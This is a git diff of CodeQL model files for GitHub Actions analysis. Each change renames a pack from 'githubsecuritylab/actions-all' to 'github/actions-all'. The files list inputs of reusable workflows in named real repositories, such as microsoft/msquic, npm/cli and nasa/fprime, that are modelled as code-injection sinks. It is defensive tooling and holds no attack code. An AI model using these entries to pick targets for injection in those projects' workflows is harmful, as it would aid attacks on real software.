@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index d246f4ce644..b14db181cce 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index a35a1a628e6..6a883e369c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index ec22645570f..9612750345d 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index e0eccb26a54..2c6f4438846 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 5f85bb1a91a..109b1fefa7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 7f1af324260..87f8bc706b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index b06b390e718..4c2f4e391b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index d5746b566cc..e3e0a3460d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index fbe9e286d2b..01539c4329b 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index 6ba2fc75375..d26e49d3ef8 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 6d522b776dc..f5b370e3d59 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index c210f350439..72659e36271 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 81eeb82033c..f37d70a718d 100644 
--- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 6d81f2ff242..3b4ed4b18b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index b7ea7250825..3dddb9bd3f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 972b6f15baa..49654eb84b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 07f0c5c0f69..f46bcbee1b3 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 6bbf33e7f89..e3791339c03 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 165965dd568..f5f6c919cfb 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 3d1e182458e..4747cd57c4d 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 689cc91871a..3b68ca76fe2 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index 0481c04cb67..62b99c23ff6 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 8c0c944a393..84347b6cbfa 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 8f4c4432408..32a3d5061e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 9406f7d299c..d4ffc373678 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 36838ef4ddb..5a5d3999ca7 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index 8b16601e6c2..9983ea4eee2 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index e8db2ff568d..e8acf5f2c3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index 208e444adeb..bd7494ab69a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 41edf0b0373..89b60a4ac84 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index faca7973f1f..7c72cb57dca 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index 76db6821c5e..2e9681cb21e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 383a88ed055..d30f1bb7bba 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index bcd3b09ed68..85771a98962 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 53e16f8771a..194ac90b648 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index 4310e028de1..d013a9c1b8f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 84d2f57a3fb..57d88f54186 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 7debf6960ed..312d9e193e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index 640180b870a..b62903a97e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index 7ea3039b552..e983a4a6c98 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index ced66aee32f..4a45392e15d 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index e63440d1fca..ac20cdeeb3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index f7021148c51..f6876b3bc56 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 8345368057c..9785efe9637 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 3754ebfa63d..3197652aadc 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index 3e35747b558..f0ebfa17724 100644 
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index a13f6863caa..74afc5c0cc5 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index af5c300ea8b..fa145f6b625 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] 
